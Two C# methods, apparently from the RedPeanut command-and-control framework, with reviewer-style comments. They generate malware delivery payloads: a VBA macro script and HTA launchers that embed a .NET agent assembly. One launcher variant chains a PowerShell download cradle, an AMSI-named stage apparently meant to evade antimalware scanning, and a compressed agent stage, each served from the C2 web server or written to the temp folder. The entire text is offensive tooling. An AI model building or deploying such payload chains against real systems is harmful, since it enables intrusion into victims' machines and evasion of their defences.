コード例 #1
        /// <summary>
        /// Generates a VBA script for the selected listener profile and writes it to the
        /// workspace output folder, after producing the stager DLL that the script's embedded
        /// assembly refers to.
        /// </summary>
        /// <remarks>
        /// Reads the instance fields <c>filename</c>, <c>lhost</c>, <c>lport</c> and <c>profile</c>.
        /// Side effects visible in this method: one call to <c>Builder.GenerateDll</c>, one web
        /// resource registered on the C2 server under a randomly named <c>.dll</c>, and one file
        /// written to <c>WORKSPACE_FOLDER/EVILCLIPPY_FOLDER/filename</c> under the current directory.
        /// These are the artifacts to look for when auditing what a run of this task left behind.
        /// Returns nothing; every failure path prints to the console or returns silently.
        /// </remarks>
        private void Run()
        {
            // NOTE(review): args is allocated but never read or written in this method.
            List <string> args = new List <string>();

            try
            {
                // Missing or out-of-range options end the task without any message to the operator.
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Locate the folder holding the .cs source templates whose placeholders are replaced below.
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    // An unknown profile id falls through to the end of the method with no output at all.
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        // Build the agent: the stager template is filled in with the server key and listener config.
                        // NOTE(review): the literal 35 is passed to both Replacer and Builder; presumably a
                        // target .NET Framework selector (3.5) - confirm against those helpers.
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                        // The DLL name is 10 generated characters plus ".dll". System.Random is not a
                        // cryptographic generator, so the name is cosmetic rather than unguessable.
                        string outfilename = RandomAString(10, new Random()) + ".dll";
                        Builder.GenerateDll(source, outfilename, 35);

                        // Register the generated DLL name as a resource on the C2 web server.
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                        // Normalise the profile's content URI: no leading slash, exactly one trailing slash.
                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        // Relative path under which the registered DLL is requested.
                        string resourcepath = uricontent + outfilename;

                        // Build the shooter assembly: its template receives the resource path and listener config.
                        source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                        source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                        // The shooter assembly is returned as a Base64 string under a second random name.
                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                        // The Base64 assembly is handed to the VBA generator, so the emitted script text
                        // presumably embeds it - confirm in VBAGenerator.
                        VBAGenerator gen = new VBAGenerator(assemblyBase64, null);

                        // Write the script to the destination directory.
                        // NOTE(review): filename is only checked for null/empty above. Path.Combine returns
                        // its last argument unchanged when that argument is rooted, so the write stays inside
                        // destdir only if filename is validated where it is set - confirm.
                        string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
                        File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
                    }
                }
            }
            catch (Exception e)
            {
                // Catch-all: only the message is printed, so the exception type and stack trace are lost.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
コード例 #2
        /// <summary>
        /// Generates an HTA launcher for the selected listener profile in one of two flavours,
        /// chosen by the <c>lang</c> field ("vbs" or "powershell"), and either registers it on the
        /// C2 web server or writes it to the temp directory depending on <c>hosted</c>.
        /// </summary>
        /// <remarks>
        /// Reads the instance fields <c>filename</c>, <c>lhost</c>, <c>lport</c>, <c>profile</c>,
        /// <c>lang</c> and <c>hosted</c>. Artifacts visible in this method, useful when auditing a run:
        /// "vbs" registers a randomly named <c>.dll</c> web resource and then either registers
        /// <c>filename</c> or writes it under <c>Path.GetTempPath()</c>; "powershell" produces three
        /// stages named <c>filename</c>, a random <c>.ps1</c> name, and the same name prefixed with
        /// <c>s2_</c>, either registered as web resources or written under <c>Path.GetTempPath()</c>.
        /// Returns nothing; failures print to the console or return silently.
        /// </remarks>
        private void Run()
        {
            // NOTE(review): args is allocated but never read or written in this method.
            List <string> args = new List <string>();

            try
            {
                // Missing or out-of-range options end the task without any message to the operator.
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    if (lang == "vbs")
                    {
                        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        // An unknown profile id falls through to the end of the method with no output.
                        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            // Build the agent: the stager template is filled in with the server key and listener config.
                            // NOTE(review): the literal 35 is presumably a target .NET Framework selector (3.5) - confirm.
                            ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                            // 10 generated characters plus ".dll"; System.Random is not a cryptographic
                            // generator, so the name is cosmetic rather than unguessable.
                            string outfilename = RandomAString(10, new Random()) + ".dll";
                            Builder.GenerateDll(source, outfilename, 35);

                            // Register the generated DLL name on the C2 web server. This happens whether or
                            // not the launcher itself is hosted.
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                            // Normalise the profile's content URI: no leading slash, exactly one trailing slash.
                            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                            if (!uricontent.EndsWith("/"))
                            {
                                uricontent += "/";
                            }

                            // Relative path under which the registered DLL is requested.
                            string resourcepath = uricontent + outfilename;

                            // Build the shooter assembly: its template receives the resource path and listener config.
                            source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                            source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                            string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                            // The Base64 assembly is handed to the HTA/VBS generator, so the emitted script
                            // presumably embeds it - confirm in HtaVBSGenerator.
                            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

                            if (hosted)
                            {
                                // Serve the launcher from the C2 web server under the operator-chosen filename.
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                Console.WriteLine("[*] Resource added to webserver resources");
                                // The https scheme is hard-coded in this message; it is not derived from conf here.
                                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                return;
                            }
                            else
                            {
                                // Write the launcher to the temp directory of the current environment.
                                // NOTE(review): filename is only checked for null/empty above. Path.Combine returns
                                // its last argument unchanged when it is rooted, so the write stays in the temp
                                // directory only if filename is validated where it is set - confirm.
                                File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                    }
                    else
                    {
                        if (lang == "powershell")
                        {
                            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                            // An unknown profile id falls through to the end of the method with no output.
                            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                            {
                                // Random name shared by the second stage and, with an "s2_" prefix, the third stage.
                                // NOTE(review): this branch calls RandomString and passes 40 to Replacer, where the
                                // vbs branch calls RandomAString and passes 35 - confirm the difference is intended.
                                string         psfilename = RandomString(10, new Random()) + ".ps1";
                                ListenerConfig conf       = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                                string         source     = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                                // Two-argument overload: no framework selector is passed in this branch.
                                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");

                                // Placeholder map shared by the first two stage generators.
                                Dictionary <string, string> arg = new Dictionary <string, string>();
                                arg.Add("#{lhost}", lhost);
                                arg.Add("#{lport}", lport.ToString());

                                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                                // Normalise the content URI: no leading slash, exactly one trailing slash.
                                uricontent = uricontent.TrimStart('/');

                                if (!uricontent.EndsWith("/"))
                                {
                                    uricontent += "/";
                                }

                                // "#{uri}" points at the third stage, whose name carries the "s2_" prefix.
                                arg.Add("#{uri}", uricontent + "s2_" + psfilename);

                                // Decode the assembly, compress it, and re-encode the compressed bytes as Base64.
                                byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                                // The agent stage is told the uncompressed length of the assembly.
                                Dictionary <string, string> argagent = new Dictionary <string, string>();
                                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                                // All three generators receive the same compressed payload; what each template
                                // does with it is not visible in this method.
                                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                                PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                                PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                                // The HTA wraps the script text of the first stage (gen_s0).
                                HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

                                if (hosted)
                                {
                                    // Serve all three stages from the C2 web server.
                                    C2Manager c2manager = Program.GetC2Manager();

                                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                    c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                                    c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                                    Console.WriteLine("[*] Resource added to webserver resources");
                                    // The https scheme is hard-coded in this message; it is not derived from conf here.
                                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                    return;
                                }
                                else
                                {
                                    // Write all three stages to the temp directory of the current environment.
                                    // NOTE(review): filename is only checked for null/empty above. Path.Combine returns
                                    // its last argument unchanged when it is rooted, so the first write stays in the
                                    // temp directory only if filename is validated where it is set - confirm.
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());

                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                                }
                            }
                        }
                        else
                        {
                            // Any value other than "vbs" or "powershell" is rejected with a message.
                            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                            return;
                        }
                    }
                }
            }catch (Exception e)
            {
                // Catch-all: only the message is printed, so the exception type and stack trace are lost.
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }